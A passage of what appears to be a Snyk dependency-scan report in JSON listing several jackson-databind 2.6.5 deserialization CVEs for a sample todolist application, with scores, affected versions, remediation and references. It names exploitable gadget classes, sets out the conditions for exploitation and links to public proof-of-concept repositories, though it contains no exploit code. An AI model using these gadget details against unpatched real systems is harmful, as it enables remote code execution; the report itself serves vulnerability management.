([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36187" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T12:47:33.579319Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T12:44:41Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.970819Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.768509Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36184", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.169091Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36184" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:02:15.197495Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.700251Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.214306Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36186" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:05:16.831143Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.206083Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.695573Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.249724Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36180" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:08:29.105792Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:05:51Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.705041Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3003", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.268380Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36183" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:11:36.206859Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:10:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.627750Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.831271Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": 